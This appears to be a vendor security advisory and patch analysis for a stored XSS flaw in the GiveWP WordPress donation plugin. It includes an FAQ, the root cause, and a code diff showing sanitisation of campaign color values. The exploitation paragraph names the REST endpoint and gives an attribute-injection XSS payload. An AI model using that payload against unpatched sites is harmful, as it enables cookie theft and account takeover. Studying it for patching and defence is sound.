What is CVE-2026-42678?

CVE-2026-42678 is a high-severity unauthenticated stored cross-site scripting (XSS) vulnerability in the GiveWP donation plugin for WordPress. It allows unauthenticated attackers to inject arbitrary scripts into donation form pages, which execute in the context of any user accessing those pages.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization of campaign color values in the GiveWP plugin. Attackers can send crafted payloads through the REST API to update campaign settings, which are then stored in the database and executed when users view the affected donation forms.

Who is affected by this vulnerability?

Any WordPress site using the GiveWP plugin version 4.14.5 or earlier is vulnerable to CVE-2026-42678. Administrators can check their plugin version in the WordPress dashboard under the Plugins section.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, verify the version of the GiveWP plugin installed. If it is version 4.14.5 or earlier, your site is at risk and should be updated immediately.

What should I do to fix this vulnerability?

To mitigate CVE-2026-42678, update the GiveWP plugin to version 4.14.6 or later, which includes patches for this vulnerability. Regularly check for updates to ensure your plugins are secure.

What is the risk level associated with this vulnerability?

The vulnerability has a CVSS score of 7.2, indicating a high severity. This means successful exploitation could allow attackers to perform actions such as stealing cookies, redirecting users, or executing scripts in the context of logged-in users.

What are the practical implications of this vulnerability?

If exploited, this vulnerability could lead to significant security breaches, including data theft and unauthorized actions on behalf of users. The stored nature of the XSS means that the malicious script persists until removed, affecting all visitors to the affected page.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an attacker can use a crafted payload to update campaign color settings via the REST API. This demonstrates the ease with which an attacker can exploit the vulnerability without authentication.

What are the specific code areas impacted by this vulnerability?

The vulnerability exists in the FormSettings.php and DonationFormViewModel.php files of the GiveWP plugin. Specifically, the primaryColor and secondaryColor properties are assigned directly from user input without proper validation or sanitization.

What measures can I take to further secure my WordPress site?

In addition to updating vulnerable plugins, implement security best practices such as regular backups, using security plugins, and monitoring for unusual activity. Ensure that all software, including WordPress core, themes, and other plugins, are kept up to date.

How can I report a vulnerability I discover?

If you discover a new vulnerability, report it responsibly to the plugin developers or through a dedicated vulnerability disclosure platform. Providing detailed information about the issue can help developers create timely patches.

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the GiveWP plugin temporarily until a secure version can be installed. Additionally, review user permissions and access controls to limit potential exploitation.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 22, 2026

CVE-2026-42678: GiveWP – Donation Plugin and Fundraising Platform <= 4.14.5 – Unauthenticated Stored Cross-Site Scripting (give)

CVE ID CVE-2026-42678

Plugin give

Severity High (CVSS 7.2)

CWE 79

Vulnerable Version 4.14.5

Patched Version 4.14.6

Disclosed May 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-42678:

This vulnerability is an unauthenticated stored cross-site scripting (XSS) flaw in the GiveWP donation plugin for WordPress, affecting versions up to and including 4.14.5. The issue stems from insufficient sanitization of campaign color values (primaryColor and secondaryColor) that are rendered directly in donation form pages without proper output escaping. An unauthenticated attacker can inject arbitrary web scripts that execute when any user accesses the affected page.

The root cause lies in two areas. First, in the FormSettings.php file (lines 325-326 of the vulnerable version), the primaryColor and secondaryColor properties are assigned directly from user input without validation: `$self->primaryColor = $array[‘primaryColor’] ?? ‘#2d802f’;` and `$self->secondaryColor = $array[‘secondaryColor’] ?? ‘#f49420’;`. These values flow from campaign settings that can be modified via the REST API. Second, in the DonationFormViewModel.php file (lines 85-94 of the vulnerable version), the primaryColor() and secondaryColor() methods return these unsanitized values directly: `return $this->formSettings->primaryColor ?? ”;` and `return $this->formSettings->secondaryColor ?? ”;`. When campaign colors are inherited (inheritCampaignColors is true), the campaign colors bypass FormSettings::fromArray entirely, using values stored directly in the campaign metadata without any sanitization.

To exploit this vulnerability, an unauthenticated attacker can send a POST request to the GiveWP REST API endpoint responsible for creating or updating campaign settings (e.g., /wp-json/give/v3/campaigns/{id}). The attacker includes a payload in the primaryColor or secondaryColor parameter, such as: `” onfocus=”alert(1)” autofocus=”true`. Since the plugin does not validate these color values, the malicious string is stored in the database. When any user (including administrators) views a donation form that inherits those campaign colors, the payload executes in their browser context. The attacker can craft more sophisticated JavaScript payloads to steal cookies, exfiltrate data, or perform actions as the victim.

The patch in version 4.14.6 addresses the vulnerability by adding proper sanitization in three places. In FormSettings.php, a new static method sanitizeHexColorOrDefault() (line 412) uses WordPress’s built-in sanitize_hex_color() function to validate that the color value is a legitimate six-digit hex color code. The main assignment lines now call this method: `$self->primaryColor = self::sanitizeHexColorOrDefault($array[‘primaryColor’] ?? ‘#2d802f’, ‘#2d802f’);`. In DonationFormViewModel.php, the return statements for both primaryColor() and secondaryColor() now wrap the result in sanitize_hex_color(): `return sanitize_hex_color($color) ?? ”;`. This ensures that even if campaign colors bypass FormSettings, they are still sanitized before output.

The impact of successful exploitation is severe (CVSS 7.2). An attacker can inject arbitrary JavaScript that executes in the context of any user viewing the donation form, including administrators. This allows the attacker to steal session cookies, capture form submissions (including payment details on the same page), redirect users to malicious sites, perform administrative actions on behalf of the victim, and potentially achieve full site compromise. The stored nature of the XSS means the payload persists until cleaned, affecting every visitor.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/give/give.php
+++ b/give/give.php
@@ -6,7 +6,7 @@
  * Description: The most robust, flexible, and intuitive way to accept donations on WordPress.
  * Author: GiveWP
  * Author URI: https://givewp.com/
- * Version: 4.14.5
+ * Version: 4.14.6
  * Requires at least: 6.6
  * Requires PHP: 7.4
  * Text Domain: give
@@ -425,7 +425,7 @@
     {
         // Plugin version.
         if (!defined('GIVE_VERSION')) {
-            define('GIVE_VERSION', '4.14.5');
+            define('GIVE_VERSION', '4.14.6');
         }

         // Plugin Root File.
--- a/give/src/API/REST/V3/Routes/Campaigns/CampaignCommentsController.php
+++ b/give/src/API/REST/V3/Routes/Campaigns/CampaignCommentsController.php
@@ -3,13 +3,14 @@
 namespace GiveAPIRESTV3RoutesCampaigns;

 use Exception;
+use GiveAPIRESTV3RoutesCampaignsPermissionsCampaignPermissions;
 use GiveAPIRESTV3RoutesCampaignsValueObjectsCampaignRoute;
 use GiveCampaignsCampaignDonationQuery;
 use GiveCampaignsModelsCampaign;
 use GiveDonationsValueObjectsDonationMetaKeys;
+use GiveFrameworkPermissionsFacadesUserPermissions;
 use WP_Error;
 use WP_REST_Controller;
-use WP_REST_Request;
 use WP_REST_Response;
 use WP_REST_Server;

@@ -38,7 +39,7 @@
                 [
                     'methods' => WP_REST_Server::READABLE,
                     'callback' => [$this, 'get_items'],
-                    'permission_callback' => '__return_true',
+                    'permission_callback' => '__return_true', // Public endpoint; access is validated inside get_items() based on campaign status and page privacy.
                     'args' => [
                         'id' => [
                             'type' => 'integer',
@@ -63,11 +64,14 @@
     }

     /**
+     * @since 4.14.6 check campaign status to block comments on inactive campaigns for non-admins
      * @since 4.0.0
      *
      * @throws Exception
+     *
+     * @return WP_REST_Response|WP_Error
      */
-    public function get_items($request): WP_REST_Response
+    public function get_items($request)
     {
         $campaignId = $request->get_param('id');
         $perPage = $request->get_param('perPage');
@@ -81,6 +85,18 @@
             return rest_ensure_response($response);
         }

+        $canViewPrivate = UserPermissions::campaigns()->canViewPrivate();
+
+        if (!$campaign->status->isActive() && !$canViewPrivate) {
+            return rest_ensure_response(
+                new WP_Error(
+                    'rest_forbidden',
+                    __('You do not have permission to view this campaign.', 'give'),
+                    ['status' => CampaignPermissions::authorizationStatusCode()]
+                )
+            );
+        }
+
         $query = (new CampaignDonationQuery($campaign))
             ->joinDonationMeta(DonationMetaKeys::DONOR_ID, 'donorIdMeta')
             ->joinDonationMeta(DonationMetaKeys::COMMENT, 'commentMeta')
--- a/give/src/API/REST/V3/Routes/Campaigns/CampaignController.php
+++ b/give/src/API/REST/V3/Routes/Campaigns/CampaignController.php
@@ -301,7 +301,9 @@
             return rest_ensure_response($response);
         }

-        if (!$campaign->status->isActive() && !UserPermissions::campaigns()->canViewPrivate()) {
+        $canViewPrivate = UserPermissions::campaigns()->canViewPrivate();
+
+        if (!$campaign->status->isActive() && !$canViewPrivate) {
             $response = new WP_Error(
                 'rest_forbidden',
                 __('You do not have permission to view this campaign.', 'give'),
--- a/give/src/DonationForms/Properties/FormSettings.php
+++ b/give/src/DonationForms/Properties/FormSettings.php
@@ -284,6 +284,7 @@
     public bool $inheritCampaignColors;

     /**
+     * @since 4.14.6 Sanitize primaryColor and secondaryColor properties
      * @since 4.14.3 Sanitize designId property
      * @since 4.1.0 Added $inheritCampaignColors
      * @since 3.16.0 Added $enableReceiptConfirmationPage
@@ -321,8 +322,8 @@
         $self->goalEndDate = $array['goalEndDate'] ?? '';
         $self->designId = isset($array['designId']) ? sanitize_html_class($array['designId']) : null;
         $self->inheritCampaignColors = $array['inheritCampaignColors'] ?? false;
-        $self->primaryColor = $array['primaryColor'] ?? '#2d802f';
-        $self->secondaryColor = $array['secondaryColor'] ?? '#f49420';
+        $self->primaryColor = self::sanitizeHexColorOrDefault($array['primaryColor'] ?? '#2d802f', '#2d802f');
+        $self->secondaryColor = self::sanitizeHexColorOrDefault($array['secondaryColor'] ?? '#f49420', '#f49420');
         $self->goalAmount = $array['goalAmount'] ?? 0;
         $self->registrationNotification = $array['registrationNotification'] ?? false;
         $self->customCss = wp_strip_all_tags($array['customCss'] ?? '');
@@ -408,6 +409,16 @@
     }

     /**
+     * Sanitize a color string to a valid hex color, falling back to the provided default.
+     *
+     * @since 4.14.6
+     */
+    private static function sanitizeHexColorOrDefault(string $raw, string $default): string
+    {
+        return sanitize_hex_color($raw) ?? $default;
+    }
+
+    /**
      * @since 3.0.0
      */
     public static function fromJson(string $json): self
--- a/give/src/DonationForms/ViewModels/DonationFormViewModel.php
+++ b/give/src/DonationForms/ViewModels/DonationFormViewModel.php
@@ -78,37 +78,43 @@
     }

     /**
+     * @since 4.14.6 Sanitize output; campaign colors bypass FormSettings::fromArray.
      * @since 4.1.0 Add support for campaign colors
      * @since 3.0.0
      */
     public function primaryColor(): string
     {
+        $color = $this->formSettings->primaryColor ?? '';
+
         if ($this->formSettings->inheritCampaignColors) {
             $campaignColors = $this->getCampaignColors($this->donationFormId);

             if ($campaignColors['primaryColor']) {
-                return $campaignColors['primaryColor'];
+                $color = $campaignColors['primaryColor'];
             }
         }

-        return $this->formSettings->primaryColor ?? '';
+        return sanitize_hex_color($color) ?? '';
     }

     /**
+     * @since 4.14.6 Sanitize output; campaign colors bypass FormSettings::fromArray.
      * @since 4.1.0 Add support for campaign colors
      * @since 3.0.0
      */
     public function secondaryColor(): string
     {
+        $color = $this->formSettings->secondaryColor ?? '';
+
         if ($this->formSettings->inheritCampaignColors) {
             $campaignColors = $this->getCampaignColors($this->donationFormId);

             if ($campaignColors['secondaryColor']) {
-                return $campaignColors['secondaryColor'];
+                $color = $campaignColors['secondaryColor'];
             }
         }

-        return $this->formSettings->secondaryColor ?? '';
+        return sanitize_hex_color($color) ?? '';
     }

     /**
--- a/give/vendor/composer/installed.php
+++ b/give/vendor/composer/installed.php
@@ -1,9 +1,9 @@
 <?php return array(
     'root' => array(
         'name' => 'impress-org/give',
-        'pretty_version' => '4.14.5',
-        'version' => '4.14.5.0',
-        'reference' => '50304207df8fa954e708adf9d67bcd9c286cfdfb',
+        'pretty_version' => '4.14.6',
+        'version' => '4.14.6.0',
+        'reference' => '14c2cd55d1040225608ab59c99bea2e937c61559',
         'type' => 'wordpress-plugin',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -20,9 +20,9 @@
             'dev_requirement' => false,
         ),
         'impress-org/give' => array(
-            'pretty_version' => '4.14.5',
-            'version' => '4.14.5.0',
-            'reference' => '50304207df8fa954e708adf9d67bcd9c286cfdfb',
+            'pretty_version' => '4.14.6',
+            'version' => '4.14.6.0',
+            'reference' => '14c2cd55d1040225608ab59c99bea2e937c61559',
             'type' => 'wordpress-plugin',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),
--- a/give/vendor/vendor-prefixed/autoload-classmap.php
+++ b/give/vendor/vendor-prefixed/autoload-classmap.php
@@ -5,167 +5,167 @@
 $strauss_src = dirname(__FILE__);

 return array(
-   'PhpToken' => $strauss_src . '/symfony/polyfill-php80/Resources/stubs/PhpToken.php',
+   'GiveVendorsSymfonyPolyfillPhp80Php80' => $strauss_src . '/symfony/polyfill-php80/Php80.php',
+   'GiveVendorsSymfonyPolyfillPhp80PhpToken' => $strauss_src . '/symfony/polyfill-php80/PhpToken.php',
    'ValueError' => $strauss_src . '/symfony/polyfill-php80/Resources/stubs/ValueError.php',
-   'Attribute' => $strauss_src . '/symfony/polyfill-php80/Resources/stubs/Attribute.php',
-   'UnhandledMatchError' => $strauss_src . '/symfony/polyfill-php80/Resources/stubs/UnhandledMatchError.php',
    'Stringable' => $strauss_src . '/symfony/polyfill-php80/Resources/stubs/Stringable.php',
-   'GiveVendorsSymfonyPolyfillPhp80PhpToken' => $strauss_src . '/symfony/polyfill-php80/PhpToken.php',
-   'GiveVendorsSymfonyPolyfillPhp80Php80' => $strauss_src . '/symfony/polyfill-php80/Php80.php',
+   'PhpToken' => $strauss_src . '/symfony/polyfill-php80/Resources/stubs/PhpToken.php',
+   'UnhandledMatchError' => $strauss_src . '/symfony/polyfill-php80/Resources/stubs/UnhandledMatchError.php',
+   'Attribute' => $strauss_src . '/symfony/polyfill-php80/Resources/stubs/Attribute.php',
    'GiveVendorsSymfonyComponentHttpFoundationHeaderUtils' => $strauss_src . '/symfony/http-foundation/HeaderUtils.php',
-   'GiveVendorsSymfonyComponentHttpFoundationRateLimiterRequestRateLimiterInterface' => $strauss_src . '/symfony/http-foundation/RateLimiter/RequestRateLimiterInterface.php',
-   'GiveVendorsSymfonyComponentHttpFoundationRateLimiterAbstractRequestRateLimiter' => $strauss_src . '/symfony/http-foundation/RateLimiter/AbstractRequestRateLimiter.php',
+   'GiveVendorsSymfonyComponentHttpFoundationParameterBag' => $strauss_src . '/symfony/http-foundation/ParameterBag.php',
+   'GiveVendorsSymfonyComponentHttpFoundationExceptionSessionNotFoundException' => $strauss_src . '/symfony/http-foundation/Exception/SessionNotFoundException.php',
+   'GiveVendorsSymfonyComponentHttpFoundationExceptionRequestExceptionInterface' => $strauss_src . '/symfony/http-foundation/Exception/RequestExceptionInterface.php',
+   'GiveVendorsSymfonyComponentHttpFoundationExceptionJsonException' => $strauss_src . '/symfony/http-foundation/Exception/JsonException.php',
+   'GiveVendorsSymfonyComponentHttpFoundationExceptionBadRequestException' => $strauss_src . '/symfony/http-foundation/Exception/BadRequestException.php',
+   'GiveVendorsSymfonyComponentHttpFoundationExceptionConflictingHeadersException' => $strauss_src . '/symfony/http-foundation/Exception/ConflictingHeadersException.php',
+   'GiveVendorsSymfonyComponentHttpFoundationExceptionSuspiciousOperationException' => $strauss_src . '/symfony/http-foundation/Exception/SuspiciousOperationException.php',
+   'GiveVendorsSymfonyComponentHttpFoundationJsonResponse' => $strauss_src . '/symfony/http-foundation/JsonResponse.php',
+   'GiveVendorsSymfonyComponentHttpFoundationBinaryFileResponse' => $strauss_src . '/symfony/http-foundation/BinaryFileResponse.php',
+   'GiveVendorsSymfonyComponentHttpFoundationFileExceptionFormSizeFileException' => $strauss_src . '/symfony/http-foundation/File/Exception/FormSizeFileException.php',
+   'GiveVendorsSymfonyComponentHttpFoundationFileExceptionUnexpectedTypeException' => $strauss_src . '/symfony/http-foundation/File/Exception/UnexpectedTypeException.php',
+   'GiveVendorsSymfonyComponentHttpFoundationFileExceptionNoFileException' => $strauss_src . '/symfony/http-foundation/File/Exception/NoFileException.php',
+   'GiveVendorsSymfonyComponentHttpFoundationFileExceptionNoTmpDirFileException' => $strauss_src . '/symfony/http-foundation/File/Exception/NoTmpDirFileException.php',
+   'GiveVendorsSymfonyComponentHttpFoundationFileExceptionUploadException' => $strauss_src . '/symfony/http-foundation/File/Exception/UploadException.php',
+   'GiveVendorsSymfonyComponentHttpFoundationFileExceptionPartialFileException' => $strauss_src . '/symfony/http-foundation/File/Exception/PartialFileException.php',
+   'GiveVendorsSymfonyComponentHttpFoundationFileExceptionFileException' => $strauss_src . '/symfony/http-foundation/File/Exception/FileException.php',
+   'GiveVendorsSymfonyComponentHttpFoundationFileExceptionAccessDeniedException' => $strauss_src . '/symfony/http-foundation/File/Exception/AccessDeniedException.php',
+   'GiveVendorsSymfonyComponentHttpFoundationFileExceptionExtensionFileException' => $strauss_src . '/symfony/http-foundation/File/Exception/ExtensionFileException.php',
+   'GiveVendorsSymfonyComponentHttpFoundationFileExceptionCannotWriteFileException' => $strauss_src . '/symfony/http-foundation/File/Exception/CannotWriteFileException.php',
+   'GiveVendorsSymfonyComponentHttpFoundationFileExceptionFileNotFoundException' => $strauss_src . '/symfony/http-foundation/File/Exception/FileNotFoundException.php',
+   'GiveVendorsSymfonyComponentHttpFoundationFileExceptionIniSizeFileException' => $strauss_src . '/symfony/http-foundation/File/Exception/IniSizeFileException.php',
+   'GiveVendorsSymfonyComponentHttpFoundationFileStream' => $strauss_src . '/symfony/http-foundation/File/Stream.php',
+   'GiveVendorsSymfonyComponentHttpFoundationFileUploadedFile' => $strauss_src . '/symfony/http-foundation/File/UploadedFile.php',
+   'GiveVendorsSymfonyComponentHttpFoundationFileFile' => $strauss_src . '/symfony/http-foundation/File/File.php',
+   'GiveVendorsSymfonyComponentHttpFoundationResponseHeaderBag' => $strauss_src . '/symfony/http-foundation/ResponseHeaderBag.php',
+   'GiveVendorsSymfonyComponentHttpFoundationAcceptHeaderItem' => $strauss_src . '/symfony/http-foundation/AcceptHeaderItem.php',
+   'GiveVendorsSymfonyComponentHttpFoundationFileBag' => $strauss_src . '/symfony/http-foundation/FileBag.php',
+   'GiveVendorsSymfonyComponentHttpFoundationRequestMatcher' => $strauss_src . '/symfony/http-foundation/RequestMatcher.php',
+   'GiveVendorsSymfonyComponentHttpFoundationStreamedResponse' => $strauss_src . '/symfony/http-foundation/StreamedResponse.php',
+   'GiveVendorsSymfonyComponentHttpFoundationTestConstraintResponseCookieValueSame' => $strauss_src . '/symfony/http-foundation/Test/Constraint/ResponseCookieValueSame.php',
+   'GiveVendorsSymfonyComponentHttpFoundationTestConstraintRequestAttributeValueSame' => $strauss_src . '/symfony/http-foundation/Test/Constraint/RequestAttributeValueSame.php',
+   'GiveVendorsSymfonyComponentHttpFoundationTestConstraintResponseFormatSame' => $strauss_src . '/symfony/http-foundation/Test/Constraint/ResponseFormatSame.php',
+   'GiveVendorsSymfonyComponentHttpFoundationTestConstraintResponseStatusCodeSame' => $strauss_src . '/symfony/http-foundation/Test/Constraint/ResponseStatusCodeSame.php',
+   'GiveVendorsSymfonyComponentHttpFoundationTestConstraintResponseHasHeader' => $strauss_src . '/symfony/http-foundation/Test/Constraint/ResponseHasHeader.php',
+   'GiveVendorsSymfonyComponentHttpFoundationTestConstraintResponseIsUnprocessable' => $strauss_src . '/symfony/http-foundation/Test/Constraint/ResponseIsUnprocessable.php',
+   'GiveVendorsSymfonyComponentHttpFoundationTestConstraintResponseHeaderSame' => $strauss_src . '/symfony/http-foundation/Test/Constraint/ResponseHeaderSame.php',
+   'GiveVendorsSymfonyComponentHttpFoundationTestConstraintResponseHasCookie' => $strauss_src . '/symfony/http-foundation/Test/Constraint/ResponseHasCookie.php',
+   'GiveVendorsSymfonyComponentHttpFoundationTestConstraintResponseIsSuccessful' => $strauss_src . '/symfony/http-foundation/Test/Constraint/ResponseIsSuccessful.php',
+   'GiveVendorsSymfonyComponentHttpFoundationTestConstraintResponseIsRedirected' => $strauss_src . '/symfony/http-foundation/Test/Constraint/ResponseIsRedirected.php',
+   'GiveVendorsSymfonyComponentHttpFoundationRequestMatcherInterface' => $strauss_src . '/symfony/http-foundation/RequestMatcherInterface.php',
+   'GiveVendorsSymfonyComponentHttpFoundationIpUtils' => $strauss_src . '/symfony/http-foundation/IpUtils.php',
+   'GiveVendorsSymfonyComponentHttpFoundationUrlHelper' => $strauss_src . '/symfony/http-foundation/UrlHelper.php',
+   'GiveVendorsSymfonyComponentHttpFoundationCookie' => $strauss_src . '/symfony/http-foundation/Cookie.php',
    'GiveVendorsSymfonyComponentHttpFoundationExpressionRequestMatcher' => $strauss_src . '/symfony/http-foundation/ExpressionRequestMatcher.php',
-   'GiveVendorsSymfonyComponentHttpFoundationInputBag' => $strauss_src . '/symfony/http-foundation/InputBag.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionSessionFactory' => $strauss_src . '/symfony/http-foundation/Session/SessionFactory.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionFlashAutoExpireFlashBag' => $strauss_src . '/symfony/http-foundation/Session/Flash/AutoExpireFlashBag.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionFlashFlashBagInterface' => $strauss_src . '/symfony/http-foundation/Session/Flash/FlashBagInterface.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionFlashFlashBag' => $strauss_src . '/symfony/http-foundation/Session/Flash/FlashBag.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionSession' => $strauss_src . '/symfony/http-foundation/Session/Session.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageSessionStorageInterface' => $strauss_src . '/symfony/http-foundation/Session/Storage/SessionStorageInterface.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageNativeSessionStorageFactory' => $strauss_src . '/symfony/http-foundation/Session/Storage/NativeSessionStorageFactory.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionSessionFactoryInterface' => $strauss_src . '/symfony/http-foundation/Session/SessionFactoryInterface.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageMockArraySessionStorage' => $strauss_src . '/symfony/http-foundation/Session/Storage/MockArraySessionStorage.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageMockFileSessionStorageFactory' => $strauss_src . '/symfony/http-foundation/Session/Storage/MockFileSessionStorageFactory.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageNativeSessionStorage' => $strauss_src . '/symfony/http-foundation/Session/Storage/NativeSessionStorage.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageProxyAbstractProxy' => $strauss_src . '/symfony/http-foundation/Session/Storage/Proxy/AbstractProxy.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageProxySessionHandlerProxy' => $strauss_src . '/symfony/http-foundation/Session/Storage/Proxy/SessionHandlerProxy.php',
    'GiveVendorsSymfonyComponentHttpFoundationSessionStorageMetadataBag' => $strauss_src . '/symfony/http-foundation/Session/Storage/MetadataBag.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionStoragePhpBridgeSessionStorage' => $strauss_src . '/symfony/http-foundation/Session/Storage/PhpBridgeSessionStorage.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageNativeSessionStorageFactory' => $strauss_src . '/symfony/http-foundation/Session/Storage/NativeSessionStorageFactory.php',
    'GiveVendorsSymfonyComponentHttpFoundationSessionStorageServiceSessionFactory' => $strauss_src . '/symfony/http-foundation/Session/Storage/ServiceSessionFactory.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageSessionStorageFactoryInterface' => $strauss_src . '/symfony/http-foundation/Session/Storage/SessionStorageFactoryInterface.php',
    'GiveVendorsSymfonyComponentHttpFoundationSessionStoragePhpBridgeSessionStorageFactory' => $strauss_src . '/symfony/http-foundation/Session/Storage/PhpBridgeSessionStorageFactory.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageProxySessionHandlerProxy' => $strauss_src . '/symfony/http-foundation/Session/Storage/Proxy/SessionHandlerProxy.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageProxyAbstractProxy' => $strauss_src . '/symfony/http-foundation/Session/Storage/Proxy/AbstractProxy.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionStoragePhpBridgeSessionStorage' => $strauss_src . '/symfony/http-foundation/Session/Storage/PhpBridgeSessionStorage.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageMockFileSessionStorageFactory' => $strauss_src . '/symfony/http-foundation/Session/Storage/MockFileSessionStorageFactory.php',
    'GiveVendorsSymfonyComponentHttpFoundationSessionStorageMockFileSessionStorage' => $strauss_src . '/symfony/http-foundation/Session/Storage/MockFileSessionStorage.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageMockArraySessionStorage' => $strauss_src . '/symfony/http-foundation/Session/Storage/MockArraySessionStorage.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageHandlerPdoSessionHandler' => $strauss_src . '/symfony/http-foundation/Session/Storage/Handler/PdoSessionHandler.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageHandlerAbstractSessionHandler' => $strauss_src . '/symfony/http-foundation/Session/Storage/Handler/AbstractSessionHandler.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageHandlerRedisSessionHandler' => $strauss_src . '/symfony/http-foundation/Session/Storage/Handler/RedisSessionHandler.php',
    'GiveVendorsSymfonyComponentHttpFoundationSessionStorageHandlerNullSessionHandler' => $strauss_src . '/symfony/http-foundation/Session/Storage/Handler/NullSessionHandler.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageHandlerStrictSessionHandler' => $strauss_src . '/symfony/http-foundation/Session/Storage/Handler/StrictSessionHandler.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageHandlerPdoSessionHandler' => $strauss_src . '/symfony/http-foundation/Session/Storage/Handler/PdoSessionHandler.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageHandlerIdentityMarshaller' => $strauss_src . '/symfony/http-foundation/Session/Storage/Handler/IdentityMarshaller.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageHandlerNativeFileSessionHandler' => $strauss_src . '/symfony/http-foundation/Session/Storage/Handler/NativeFileSessionHandler.php',
    'GiveVendorsSymfonyComponentHttpFoundationSessionStorageHandlerMongoDbSessionHandler' => $strauss_src . '/symfony/http-foundation/Session/Storage/Handler/MongoDbSessionHandler.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageHandlerMigratingSessionHandler' => $strauss_src . '/symfony/http-foundation/Session/Storage/Handler/MigratingSessionHandler.php',
    'GiveVendorsSymfonyComponentHttpFoundationSessionStorageHandlerMemcachedSessionHandler' => $strauss_src . '/symfony/http-foundation/Session/Storage/Handler/MemcachedSessionHandler.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageHandlerStrictSessionHandler' => $strauss_src . '/symfony/http-foundation/Session/Storage/Handler/StrictSessionHandler.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageHandlerSessionHandlerFactory' => $strauss_src . '/symfony/http-foundation/Session/Storage/Handler/SessionHandlerFactory.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageHandlerRedisSessionHandler' => $strauss_src . '/symfony/http-foundation/Session/Storage/Handler/RedisSessionHandler.php',
    'GiveVendorsSymfonyComponentHttpFoundationSessionStorageHandlerMarshallingSessionHandler' => $strauss_src . '/symfony/http-foundation/Session/Storage/Handler/MarshallingSessionHandler.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageHandlerMigratingSessionHandler' => $strauss_src . '/symfony/http-foundation/Session/Storage/Handler/MigratingSessionHandler.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageHandlerNativeFileSessionHandler' => $strauss_src . '/symfony/http-foundation/Session/Storage/Handler/NativeFileSessionHandler.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageHandlerIdentityMarshaller' => $strauss_src . '/symfony/http-foundation/Session/Storage/Handler/IdentityMarshaller.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageSessionStorageFactoryInterface' => $strauss_src . '/symfony/http-foundation/Session/Storage/SessionStorageFactoryInterface.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageNativeSessionStorage' => $strauss_src . '/symfony/http-foundation/Session/Storage/NativeSessionStorage.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionSessionUtils' => $strauss_src . '/symfony/http-foundation/Session/SessionUtils.php',
-   'GiveVendorsSymfonyComponentHttpFoundationSessionSessionBagProxy' => $strauss_src . '/symfony/http-foundation/Session/SessionBagProxy.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageHandlerSessionHandlerFactory' => $strauss_src . '/symfony/http-foundation/Session/Storage/Handler/SessionHandlerFactory.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageHandlerAbstractSessionHandler' => $strauss_src . '/symfony/http-foundation/Session/Storage/Handler/AbstractSessionHandler.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionStorageSessionStorageInterface' => $strauss_src . '/symfony/http-foundation/Session/Storage/SessionStorageInterface.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionSessionBagInterface' => $strauss_src . '/symfony/http-foundation/Session/SessionBagInterface.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionFlashAutoExpireFlashBag' => $strauss_src . '/symfony/http-foundation/Session/Flash/AutoExpireFlashBag.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionFlashFlashBag' => $strauss_src . '/symfony/http-foundation/Session/Flash/FlashBag.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionFlashFlashBagInterface' => $strauss_src . '/symfony/http-foundation/Session/Flash/FlashBagInterface.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionSession' => $strauss_src . '/symfony/http-foundation/Session/Session.php',
+   'GiveVendorsSymfonyComponentHttpFoundationSessionSessionInterface' => $strauss_src . '/symfony/http-foundation/Session/SessionInterface.php',
    'GiveVendorsSymfonyComponentHttpFoundationSessionAttributeAttributeBagInterface' => $strauss_src . '/symfony/http-foundation/Session/Attribute/AttributeBagInterface.php',
